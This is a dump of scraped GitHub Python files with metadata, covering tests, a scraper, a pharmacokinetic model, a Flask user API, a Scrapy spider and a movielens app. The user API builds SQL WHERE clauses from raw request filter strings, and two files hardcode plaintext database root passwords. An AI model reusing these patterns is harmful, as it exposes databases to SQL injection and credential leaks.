"pprint.pprint", "line_number": 50, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "31446184915", "text": "# %% imports\nimport json\n\nimport pytest\nfrom language.lexeme_decoder import LexemeDecoder\nfrom mongomock import MongoClient\nfrom storage.language_datastore import LanguageDatastore\n\n# constants\nLANGUAGE = \"polish\"\n\n\n# %% pytest fixtures\n# https://stackoverflow.com/questions/22627659/run-code-before-and-after-each-test-in-py-test, https://docs.pytest.org/en/6.2.x/fixture.html\n@pytest.fixture(autouse=True)\ndef language_datastore():\n \"\"\"\n Establish a connection to the mongodb database\n \"\"\"\n ds_client = MongoClient()\n test_language_datastore = LanguageDatastore(ds_client, LANGUAGE)\n\n # run test\n yield test_language_datastore\n\n # cleanup\n test_language_datastore.lexicon_connector.collection.drop({})\n test_language_datastore.inflections_connector.collection.drop({})\n\n\n# %% tests\n# push and get\ndef test_add_and_get_lexeme(language_datastore):\n json_str = open('tests/storage/data/noun_czerwony.json').read()\n lexeme = json.loads(json_str, cls=LexemeDecoder)\n language_datastore.add_lexeme(lexeme)\n returned_lexeme = language_datastore.get_lexeme_from_form(\n form=lexeme.inflections['S']['I'], pos=\"NOUN\")\n\n assert returned_lexeme\n\n\ndef test_get_lexeme_none(language_datastore):\n noun_str = open('tests/storage/data/noun_czerwony.json').read()\n noun = json.loads(noun_str, cls=LexemeDecoder)\n adj_str = open('tests/storage/data/adjective_czerwony.json').read()\n adj = json.loads(adj_str, cls=LexemeDecoder)\n\n language_datastore.add_lexeme(noun)\n language_datastore.add_lexeme(adj)\n\n assert language_datastore.get_lexeme_from_form(\n form='niebieski', pos=\"ADJECTIVE\") == None\n\n\ndef test_get_lexeme_wrong_pos_none(language_datastore):\n noun_str = open('tests/storage/data/noun_czerwony.json').read()\n noun = json.loads(noun_str, cls=LexemeDecoder)\n adj_str = open('tests/storage/data/adjective_czerwony.json').read()\n adj = json.loads(adj_str, cls=LexemeDecoder)\n\n language_datastore.add_lexeme(noun)\n language_datastore.add_lexeme(adj)\n\n assert language_datastore.get_lexeme_from_form(\n form='czerwony', pos=\"ADVERB\") == None\n\n\ndef test_add_and_get_lexemes(language_datastore):\n noun_str = open('tests/storage/data/noun_czerwony.json').read()\n noun = json.loads(noun_str, cls=LexemeDecoder)\n adj_str = open('tests/storage/data/adjective_czerwony.json').read()\n adj = json.loads(adj_str, cls=LexemeDecoder)\n\n language_datastore.add_lexeme(noun)\n language_datastore.add_lexeme(adj)\n returned_lexemes = language_datastore.get_lexemes_from_form(\n form='czerwony')\n\n assert returned_lexemes\n\n\ndef test_get_lexemes_none(language_datastore):\n noun_str = open('tests/storage/data/noun_czerwony.json').read()\n noun = json.loads(noun_str, cls=LexemeDecoder)\n adj_str = open('tests/storage/data/adjective_czerwony.json').read()\n adj = json.loads(adj_str, cls=LexemeDecoder)\n\n language_datastore.add_lexeme(noun)\n language_datastore.add_lexeme(adj)\n\n assert language_datastore.get_lexemes_from_form(form='niebieski') == {}\n\n\ndef test_get_lexemes_wrong_pos_none(language_datastore):\n noun_str = open('tests/storage/data/noun_czerwony.json').read()\n noun = json.loads(noun_str, cls=LexemeDecoder)\n adj_str = open('tests/storage/data/adjective_czerwony.json').read()\n adj = json.loads(adj_str, cls=LexemeDecoder)\n\n language_datastore.add_lexeme(noun)\n language_datastore.add_lexeme(adj)\n\n assert language_datastore.get_lexemes_from_form(\n form='niebieski', poses=['VERB', 'ADVERB']) == {}\n\n\n# %% main\ndef main():\n pass\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "BieniekAlexander/ltt", "sub_path": "backend/tests/storage/language_datastore_test.py", "file_name": "language_datastore_test.py", "file_ext": "py", "file_size_in_byte": 3638, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "mongomock.MongoClient", "line_number": 20, "usage_type": "call"}, {"api_name": "storage.language_datastore.LanguageDatastore", "line_number": 21, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 15, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 35, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 35, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 45, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 45, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 47, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 47, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 58, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 58, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 60, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 60, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 71, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 71, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 73, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 73, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 85, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 85, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 87, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 87, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 97, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 97, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 99, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 99, "usage_type": "name"}]} +{"seq_id": "24434218534", "text": "from urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom bs4 import BeautifulSoup\ndef getTitle(url):\n # 尝试打开网址\n try:\n html = urlopen(url)\n # 打开失败,抛出错误\n except HTTPError as e:\n return None\n # 打开成功,但没有想要的字段,抛出错误\n try:\n bsObj = BeautifulSoup(html.read())\n title = bsObj.body.h1\n except AttributeError as e:\n return None \n return title\ntitle = getTitle(\"http://pythonscraping.com/pages/page1.html\")\nif title == None:\n print(\"title could not be found\")\nelse:\n print(title)\n ", "repo_name": "gledfish/Codes", "sub_path": "Language/PythonCodes/Python-Scratch/book-data-gathering/chapter-2/error_handle.py", "file_name": "error_handle.py", "file_ext": "py", "file_size_in_byte": 621, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "urllib.request.urlopen", "line_number": 7, "usage_type": "call"}, {"api_name": "urllib.error.HTTPError", "line_number": 9, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "9233138693", "text": "# The code allows you to visualize how the drug concentrations in the\n# central compartment (q_c) and the peripheral compartment (q_p1) \n# change over time for different sets of model parameters. \n# It provides a comparison between the two models.\n\n\n# import the necessary libraries, including matplotlib.pylab for plotting, numpy for numerical operations, \n# and scipy.integrate for solving differential equations.\nimport matplotlib.pylab as plt\nimport numpy as np\nimport scipy.integrate\n\n\n# define a function dose(t, X) that represents the drug dose as a function of time. \n# It's a simple function that returns a constant dose X at any given time t.\ndef dose(t, X):\n return X\n\n# define the right-hand side (rhs) function\n# rhs(t, y, Q_p1, V_c, V_p1, CL, X)\n# This function represents the pharmacokinetic model, with q_c and q_p1 as state variables. \n# It calculates the rate of change of these variables based on the given parameters and drug dose function.\ndef rhs(t, y, Q_p1, V_c, V_p1, CL, X):\n q_c, q_p1 = y\n transition = Q_p1 * (q_c / V_c - q_p1 / V_p1)\n dqc_dt = dose(t, X) - q_c / V_c * CL - transition\n dqp1_dt = transition\n return [dqc_dt, dqp1_dt]\n\n# define two sets of model parameters, model1_args and model2_args\n# each represent different model scenarios with various parameter values.\nmodel1_args = {\n 'name': 'model1',\n 'Q_p1': 1.0,\n 'V_c': 1.0,\n 'V_p1': 1.0,\n 'CL': 1.0,\n 'X': 1.0,\n}\n\nmodel2_args = {\n 'name': 'model2',\n 'Q_p1': 2.0,\n 'V_c': 1.0,\n 'V_p1': 1.0,\n 'CL': 1.0,\n 'X': 1.0,\n}\n\n# time array t_eval to evaluate the model over a range of time points.\nt_eval = np.linspace(0, 1, 1000)\n\n#initialize the initial conditions for the state variables in y0.\ny0 = np.array([0.0, 0.0])\n\n# create a Matplotlib figure for plotting.\nfig = plt.figure()\n\n# Loop through both models (model1_args and model2_args\n# to solve the pharmacokinetic model for each. \n# For each model, you set the model parameters,solve the differential equations\n# using scipy.integrate.solve_ivp, and then plot the results for both q_c and q_p1 over time.\nfor model in [model1_args, model2_args]:\n args = [\n model['Q_p1'], model['V_c'], model['V_p1'], model['CL'], model['X']\n ]\n sol = scipy.integrate.solve_ivp(\n fun=lambda t, y: rhs(t, y, *args),\n t_span=[t_eval[0], t_eval[-1]],\n y0=y0, t_eval=t_eval\n )\n plt.plot(sol.t, sol.y[0, :], label=model['name'] + '- q_c')\n plt.plot(sol.t, sol.y[1, :], label=model['name'] + '- q_p1')\n\n# Add labels, legends, and axis labels to the plot.\nplt.legend()\nplt.ylabel('drug mass [ng]')\nplt.xlabel('time [h]')\nplt.show()\n", "repo_name": "AndrewNicoll1/software-pk", "sub_path": "prototype.py", "file_name": "prototype.py", "file_ext": "py", "file_size_in_byte": 2649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.linspace", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pylab.figure", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 57, "usage_type": "name"}, {"api_name": "scipy.integrate.integrate.solve_ivp", "line_number": 67, "usage_type": "call"}, {"api_name": "scipy.integrate.integrate", "line_number": 67, "usage_type": "attribute"}, {"api_name": "scipy.integrate", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pylab.legend", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pylab.ylabel", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pylab.xlabel", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pylab.show", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 79, "usage_type": "name"}]} +{"seq_id": "29399159606", "text": "\nimport logging\n\nDEBUG = True\n\nDB_SPOTLIGHT_URI = 'mysql://root:123@127.0.0.1:3306/db_operator'\nDB_POOL_RECYCLE_TIMEOUT = 10\nDB_POOL_SIZE = 5\nDB_DEBUG = False\n\nLOGGING_PATH = '/home/brian/temp/log/Operator'\nLOGGING_FILE = 'Operator.log'\nLOGGING_LEVEL = logging.ERROR\n", "repo_name": "brianzhang/OperatorCenter", "sub_path": "OperatorCore/applications/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 267, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.ERROR", "line_number": 13, "usage_type": "attribute"}]} +{"seq_id": "1503897199", "text": "import triangle.array_util as util\n\nimport aztec.binary_layers_catalan as blc\n\n\n\nrow_dict = dict()\nrow_dict[1] =[[k, ] for k in range(0, 2)]\nrow_dict[0] = [(0,), ]\n\n\ndef get_row(size):\n if size not in row_dict:\n row_list = []\n prev_list = get_row(size-1)\n for idx in range(size+1):\n for prev in prev_list:\n if idx == 0 or idx > max(prev):\n row_list.append([idx,] + prev)\n\n row_dict[size] = row_list\n\n return row_dict[size]\n\n\ntt_dict = dict()\ntt_dict[1] = [[[k, ],] for k in range(0,2)]\n\ndef get_tile_triangle(size):\n if not size in tt_dict:\n new_list = []\n prev_list = get_tile_triangle(size-1)\n row_list = get_row(size)\n\n for row in row_list:\n for prev in prev_list:\n is_compatible = True\n\n if sum(prev[0]) > 0 and sum(row) == 0:\n is_compatible = False\n else:\n for idx in range(len(prev)):\n if row[idx] == 0:\n if prev[0][idx] > 0 and not any( x >= prev[0][idx] for x in row[idx:len(row)]):\n is_compatible = False\n break\n elif prev[0][idx] >= row[idx]:\n is_compatible = False\n break\n\n if is_compatible:\n new_list.append([row] + prev)\n\n tt_dict[size] = new_list\n\n return tt_dict[size]\n\n\ndef replace_zeros_list(tri_list):\n return [ replace_zeros(triangle) for triangle in tri_list]\n\ndef replace_zeros(triangle):\n new_triangle = [[x for x in row] for row in triangle]\n\n for row in new_triangle:\n current_max = 0\n for idx in reversed(range(len(row))):\n if row[idx] > current_max:\n current_max = row[idx]\n elif row[idx] == 0 and current_max > 0:\n row[idx] = current_max\n\n return new_triangle\n\n\nif __name__ == '__main__':\n\n size = 3\n\n tri_list = get_tile_triangle(size)\n\n #blc_list = blc.get_binary_layers(size)\n\n print('xxxxxxxxxxxxxxxx')\n\n for t in tri_list:\n util.print_array(t)\n util.print_array(replace_zeros(t))\n print('===============')\n\n\n # for b in blc_list:\n # if not b in tri_list:\n # util.print_array(b)\n\n print(len(tri_list))\n\n util.print_block_totals(tri_list)\n\n my_tri_lists = [get_tile_triangle(2), get_tile_triangle(3), get_tile_triangle(4)]\n my_totals = [util.print_block_totals(x) for x in my_tri_lists]\n print('block totals=', my_totals)\n\n\n t = tri_list[50]\n max_t = tri_list[-1]\n\n util.get_mma_block_pyramid(t, max_t)", "repo_name": "mathbeveridge/asm", "sub_path": "aztec/build_tile_triangle.py", "file_name": "build_tile_triangle.py", "file_ext": "py", "file_size_in_byte": 2730, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "triangle.array_util", "line_number": 60, "usage_type": "argument"}, {"api_name": "triangle.array_util", "line_number": 63, "usage_type": "name"}, {"api_name": "triangle.array_util.print_array", "line_number": 87, "usage_type": "call"}, {"api_name": "triangle.array_util", "line_number": 87, "usage_type": "name"}, {"api_name": "triangle.array_util.print_array", "line_number": 88, "usage_type": "call"}, {"api_name": "triangle.array_util", "line_number": 88, "usage_type": "name"}, {"api_name": "triangle.array_util.print_block_totals", "line_number": 98, "usage_type": "call"}, {"api_name": "triangle.array_util", "line_number": 98, "usage_type": "name"}, {"api_name": "triangle.array_util.print_block_totals", "line_number": 101, "usage_type": "call"}, {"api_name": "triangle.array_util", "line_number": 101, "usage_type": "name"}, {"api_name": "triangle.array_util.get_mma_block_pyramid", "line_number": 108, "usage_type": "call"}, {"api_name": "triangle.array_util", "line_number": 108, "usage_type": "name"}]} +{"seq_id": "23607767141", "text": "#!/usr/bin/env python2.6\n\nimport sys, math\nimport fractions\nfrom itertools import repeat, count, cycle, ifilter, ifilterfalse, \\\n imap, starmap, tee, izip, product, combinations, \\\n permutations\nfrom collections import defaultdict\nfrom operator import itemgetter\n\n\ndef mapInstance( foo, istream ):\n N, M = map( int, istream.readline().split() )\n idata = []\n for i in xrange(N):\n idata.append( istream.readline().strip() )\n idata2 = []\n for i in xrange(M):\n idata2.append( istream.readline().strip() )\n return foo( idata, idata2 )\n \ndef mapInput( foo, preproc = None, istream = sys.stdin, ostream = sys.stdout ):\n N = map( int, istream.readline().split() )[0]\n if preproc:\n pass\n odata = starmap( mapInstance, repeat( ( foo, istream ), N ) )\n for i, d in enumerate( odata ):\n print >>sys.stderr, \"Case #%d\" % ( i+1 )\n print >>ostream, \"Case #%d: %s\" % ( i+1, d )\n \nclass showfunction:\n def __init__( self, foo ):\n self.foo = foo\n \n def __call__( self, *args ):\n result = self.foo( *args )\n print >>sys.stderr, args, result\n return result\n\nclass cachedfunction:\n def __init__( self, foo ):\n self.foo = foo\n self.cache = {}\n \n def __call__( self, *args ):\n if args in self.cache:\n return self.cache[args]\n else:\n result = self.cache[args] = self.foo( *args )\n return result\n\nclass FS:\n def __init__(self, paths):\n self.root = {}\n self.inserts(paths)\n\n def splitPath(self, p):\n return p.strip('/').split('/')\n\n def inserts(self, paths):\n paths.sort()\n cnt = 0\n for p in paths:\n cnt += self.insert(p)\n return cnt\n\n def insert(self, path):\n path = self.splitPath(path)\n cnt = 0\n n = self.root\n for d in path:\n if d not in n:\n n[d] = {}\n cnt += 1\n n = n[d]\n return cnt\n\n\ndef solve( old, new ):\n fs = FS(old)\n return str(fs.inserts(new))\n \ndef main( args ):\n mapInput( solve )\n\nif __name__ == \"__main__\":\n main( sys.argv )\n", "repo_name": "dr-dos-ok/Code_Jam_Webscraper", "sub_path": "solutions_python/Problem_59/129.py", "file_name": "129.py", "file_ext": "py", "file_size_in_byte": 2217, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.stdin", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 22, "usage_type": "attribute"}, {"api_name": "itertools.starmap", "line_number": 26, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 28, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 87, "usage_type": "attribute"}]} +{"seq_id": "16104243358", "text": "from flask import jsonify, make_response, request, current_app\nfrom flask_restplus import Resource, fields, reqparse\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\nfrom math import ceil\n\nfrom app.database.models import User\nfrom app.database.db import db\nfrom app.api.roles import ROLES\nfrom app.api.access_control import role_required, auth_required\nfrom app.api.filtering import filter_users, filter_delete\nfrom app.api.errors import error_response\nfrom app.api import users_ns, api\n\nparser = reqparse.RequestParser()\nparser.add_argument('Authorization', location='headers', help='Bearer token', required=True)\nparser.add_argument('page', type=int, required=False, location='args', help=1)\nparser.add_argument('per_page', type=int, required=False, location='args', help=10)\nparser.add_argument('filter', type=str, required=False, help='Supported operators >,<,=,!=,AND,OR', location='args')\n\ntoken_parser = reqparse.RequestParser()\ntoken_parser.add_argument('Authorization', location='headers', help='Bearer token', required=True)\n\ndel_parser = reqparse.RequestParser()\ndel_parser.add_argument('Authorization', location='headers', help='Bearer token', required=True)\ndel_parser.add_argument('filter', type=str, required=False, help='Supported operators >,<,=,!=,AND,OR', location='args')\n\nmeta_data = api.model('meta',{\n\t'total_items': fields.Integer(required=True, description='Total users', example=5),\n\t'page': fields.Integer(required=True, description='Current page number', example=2, default=1),\n\t'total_pages': fields.Integer(required=True, description='Total pages', example=4),\n 'per_page': fields.Integer(required=True, description='Users per page', example=10, min=1)\n})\n\nuser_info = api.model('user',{\n\t'id': fields.Integer(required=True, description='User id', example=5),\n\t'username': fields.String(required=True, description='Username', example='athlete'),\n\t'role': fields.Integer(required=True, description='Roles - 0:user, 1:user_managiger, 2:admin', example=1),\n 'email': fields.String(required=True, description='user email', example='athlete@example.com'),\n 'subscriber': fields.Boolean(required=True, description='Is user a subscriber', example=True, default=True)\n})\n\nusers_list_response = api.model('UserList', {\n '_meta': fields.Nested(meta_data, description = 'Meta data'),\n 'items': fields.List(fields.Nested(user_info)),\n})\n\ndel_info = api.model('Del',{\n\t'count': fields.Integer(required=True, description='Number of users deleted', example=3)\n})\n\nput_fields = api.model('UpdateUser', {\n\t'password': fields.String(required=False, description='Password', example='secure_password'),\n 'username': fields.String(required=False, description='Username', example='athlete'),\n 'email': fields.String(required=False, description='Email', example='test@example.com')\n})\n\npost_fields = api.model('CreateUser', {\n\t'password': fields.String(required=True, description='Password', example='secure_password'),\n 'username': fields.String(required=True, description='Username', example='athlete'),\n 'email': fields.String(required=True, description='Email', example='test@example.com')\n})\n\n@users_ns.route('/all')\nclass UsersAllApi(Resource):\n\n\t@api.expect(parser, validate=True)\n\t@api.response(200, 'Success', model=users_list_response)\n\t@api.response(400, 'Invalid authentication header')\n\t@api.response(401, 'Authentication failed')\n\n\t@auth_required\n\t@jwt_required\n\t@role_required(ROLES['user_manager'])\n\tdef get(self):\n\t\t\"\"\" Read information of all users.\n\t\tNote : Cannot read information of users with higher role\"\"\"\n\t\tparser.parse_args()\n\t\tcurrent_user = User.query.get(get_jwt_identity())\n\t\tpage = request.args.get('page', 1, type=int)\n\t\tper_page = request.args.get('per_page', current_app.config['USERS_PER_PAGE'], type=int)\n\t\tif per_page > current_app.config['USERS_PER_PAGE']:\n\t\t\tper_page = current_app.config['USERS_PER_PAGE']\n\t\twhere_stmt = request.args.get('filter', \"\")\n\t\tif len(where_stmt)>0:\n\t\t\twhere_stmt = 'WHERE role<=%d AND (%s)' %(current_user.role, where_stmt)\n\t\telse:\n\t\t\twhere_stmt = 'WHERE role<=%d' %current_user.role\n\t\t(users, total) = filter_users(current_app, User.table_schema, 'user', where_stmt, page, per_page)\n\t\ttotal_pages = ceil(total/per_page)\n\t\tdata = User.to_dict_collection(users, page, per_page, total_pages)\n\t\tif total>page*per_page:\n\t\t\tdata['next_page'] = page+1\n\t\tif page>1:\n\t\t\tdata['prev_page'] = page-1\n\t\treturn make_response(jsonify(data), 200)\n\n\t@api.expect(del_parser, validate=True)\n\t@api.response(200, 'Success', model=del_info)\n\t@api.response(400, 'Invalid authentication header')\n\t@api.response(401, 'Authentication failed')\n\t@api.response(403, 'Permission denied')\n\n\t@auth_required\n\t@jwt_required\n\t@role_required(ROLES['user_manager'])\n\tdef delete(self):\n\t\t\"\"\" Delete all users. Cannot remove user with higher roles\"\"\"\n\t\tdel_parser.parse_args()\n\t\tcurrent_user = User.query.get(get_jwt_identity())\n\t\twhere_stmt = request.args.get('filter', \"\")\n\t\tif len(where_stmt)>0:\n\t\t\twhere_stmt = 'WHERE (role<=%d AND id!=%d) AND (%s)' %(current_user.role, current_user.id, where_stmt)\n\t\telse:\n\t\t\twhere_stmt = 'WHERE role<=%d AND id!=%d' %(current_user.role, current_user.id)\n\t\tcount = filter_delete(current_app, 'user', where_stmt)\n\t\treturn make_response(jsonify(count=count), 200)\n\n@users_ns.route('/')\nclass UserApi(Resource):\n\n\t@api.expect(token_parser, validate=True)\n\t@api.response(200, 'Success', model=user_info)\n\t@api.response(400, 'Invalid authentication header')\n\t@api.response(401, 'Authentication failed')\n\t@api.response(404, 'User not found')\n\n\t@auth_required\n\t@jwt_required\n\tdef get(self, id):\n\t\t\"\"\" Get information of a particular user. Access level is restricted by roles.\n\t\tuser : Can only access own information\n\t\tuser_manager : Can access information of all users and user_managers\n\t\tadmin : Can access information of everyone\"\"\"\n\t\tuser = User.query.get(id)\n\t\tcurrent_user = User.query.get(get_jwt_identity())\n\t\tif not user:\n\t\t\treturn error_response('USER NOT FOUND', 404)\n\t\tif int(id)!=int(get_jwt_identity()) and (current_user.role N:\n\t\t\t\twindow.pop(0)\n\t\t\t\tresult = [None]*len(tup)\n\t\t\t\tfor i in range(len(tup)): result[i] = [t[i] for t in window]\n\t\t\t\tprev_window = tuple(result)\n\ndef filter_tokenise(text):\n\ttext = text.lower()\n\tr = []\n\tfor w in re.split('[^0-9a-z\\.\\$]+',text):\n\t\tw = preprocess(w)\n\t\tif w: r.append(w)\n\treturn r\n\n\nnon_alphanum = re.compile('\\W') \nnumber = re.compile('[0-9]')\nsplitter = re.compile('[\\s\\.\\-\\/]+')\nmodel = re.compile('([.\\#]+\\w+|\\w+[.\\#]+)')\nstemmer = PorterStemmer()\nstop_words = set(nltk.corpus.stopwords.words('english'))\ndef preprocess(word):\n\tglobal users\n\tw = word\n\tw = w.lower()\n\tif w in stop_words: return\n\tw = number.sub(\"#\",w)\n\tif model.match(w): return #w = \"#MODEL#\"\n\tif w in users: return \"#USER#\"\n\tw = stemmer.stem_word(w)\n\tif len(w) < 3 : return\n\treturn w\n", "repo_name": "shawntan/tuning-machines", "sub_path": "lib/io/reader.py", "file_name": "reader.py", "file_ext": "py", "file_size_in_byte": 1695, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "time.localtime", "line_number": 17, "usage_type": "call"}, {"api_name": "re.split", "line_number": 53, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 59, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 60, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 61, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 62, "usage_type": "call"}, {"api_name": "nltk.stem.porter.PorterStemmer", "line_number": 63, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 64, "usage_type": "call"}, {"api_name": "nltk.corpus", "line_number": 64, "usage_type": "attribute"}]} +{"seq_id": "33135782049", "text": "# 百度贴吧crawl spider版本\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom tieba.items import TiebaItem\n\n\nclass TbSpider(CrawlSpider):\n name = 'tb'\n allowed_domains = ['tieba.baidu.com']\n start_urls = ['https://tieba.baidu.com/mo/q----,sz@320_240-1-3---2/m?kw=%E6%9D%8E%E6%AF%85&pn=0']\n rules = (\n # 注意要将正则表达式中的特殊字符如?.进行转义。✅\n # 获取每个帖子的链接\n Rule(LinkExtractor(allow=r'm\\?kz=\\d+&is_bakan=\\d+&lp=\\d+&pinf=\\d+_\\d+_\\d+'), callback='parse_item'),\n # 翻页\n Rule(LinkExtractor(allow=r'm\\?kw=%E6%9D%8E%E6%AF%85&lp=\\d+&lm=&pn=\\d+'), follow=True),\n )\n\n def parse_item(self, response):\n # 通过meta中是否有item来判断是否是首次调用\n item = response.meta.get('item', None)\n # 如果是首次调用\n if not item:\n item = TiebaItem()\n item['img_url_list'] = list() # 帖子中所有图片的url\n item['url'] = response.url # 当前帖子的url\n item['title'] = response.xpath(\"//div[@class='bc p']/strong/text()\").extract_first() # 帖子标题\n item['poster'] = response.xpath(\n \"//div[@class='d']/div[1]//span[@class='g']//a/text()\").extract_first() # 发帖人\n\n # 将帖子当前页中的图片url加入列表中\n item['img_url_list'] += response.xpath(\"//img[@class='BDE_Image']/@src\").extract()\n # 获取帖子下一页的url\n next_url = response.xpath(\"//a[text()='下一页']/@href\").extract_first()\n\n # 判断帖子是否还有下一页\n if next_url: # 如果有 继续发送请求,提取数据\n next_url = response.urljoin(next_url)\n yield scrapy.Request(url=next_url, callback=self.parse_item, meta=dict(item=item))\n else: # 如果没有,将item传到pipeline\n yield item\n", "repo_name": "kenzzuli/hm_15", "sub_path": "spider/day10/tieba/tieba/spiders/tb.py", "file_name": "tb.py", "file_ext": "py", "file_size_in_byte": 1958, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.spiders.CrawlSpider", "line_number": 8, "usage_type": "name"}, {"api_name": "scrapy.spiders.Rule", "line_number": 15, "usage_type": "call"}, {"api_name": "scrapy.linkextractors.LinkExtractor", "line_number": 15, "usage_type": "call"}, {"api_name": "scrapy.spiders.Rule", "line_number": 17, "usage_type": "call"}, {"api_name": "scrapy.linkextractors.LinkExtractor", "line_number": 17, "usage_type": "call"}, {"api_name": "tieba.items.TiebaItem", "line_number": 25, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "26389498774", "text": "from flask import Flask, render_template , request\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom sqlalchemy import create_engine\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy import Column, Integer, String, Float, BIGINT, CHAR ,VARCHAR, ForeignKey \r\nfrom sqlalchemy import func\r\nfrom sqlalchemy.orm import relationship\r\nfrom sqlalchemy import text\r\nfrom sqlalchemy import Index \r\nfrom sqlalchemy import distinct\r\nfrom sqlalchemy import and_\r\nfrom sqlalchemy import create_engine, inspect \r\nfrom sqlalchemy.dialects.mysql import VARCHAR, LONGTEXT\r\n\r\n\r\n\r\n\r\nBase = declarative_base()\r\n\r\n# create the extension\r\ndb = SQLAlchemy()\r\n# create the app\r\napp = Flask(__name__,template_folder='template')\r\n# configure the SQLite database, relative to the app instance folder\r\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"mysql://root:Mehdi11061997@localhost/movielens\"\r\n\r\n# initialize the app with the extension\r\ndb.init_app(app)\r\n\r\n #Connect to the database\r\nengine = create_engine(\"mysql://root:Mehdi11061997@localhost/movielens\")\r\n #import tables\r\nclass movies(db.Model):\r\n __tablename__ = 'movies'\r\n movieId = Column(Integer, primary_key=True)\r\n title = Column(String)\r\n genres = Column(String(50))\r\n\r\nclass newtable(db.Model):\r\n __tablename__ = 'newtable'\r\n\r\n movieId = db.Column(db.Integer, primary_key=True)\r\n avg_rating = db.Column(db.Float)\r\n rating_count = db.Column(db.Integer)\r\n\r\n\r\nclass newtable2(db.Model):\r\n __tablename__ = 'newtable2'\r\n title = db.Column(VARCHAR(255))\r\n userId = db.Column(LONGTEXT)\r\n rating = db.Column(Float)\r\n idd=db.Column(Integer, primary_key=True)\r\n\r\n\r\nclass links(db.Model):\r\n __tablename__ = 'links'\r\n linkid= Column(Integer,primary_key=True)\r\n movieId = Column(Integer, ForeignKey('movies.movieId'))\r\n tmdbId = Column(Integer)\r\n imdbId = Column(CHAR(9))\r\n\r\nclass ratings(db.Model):\r\n __tablename__ = 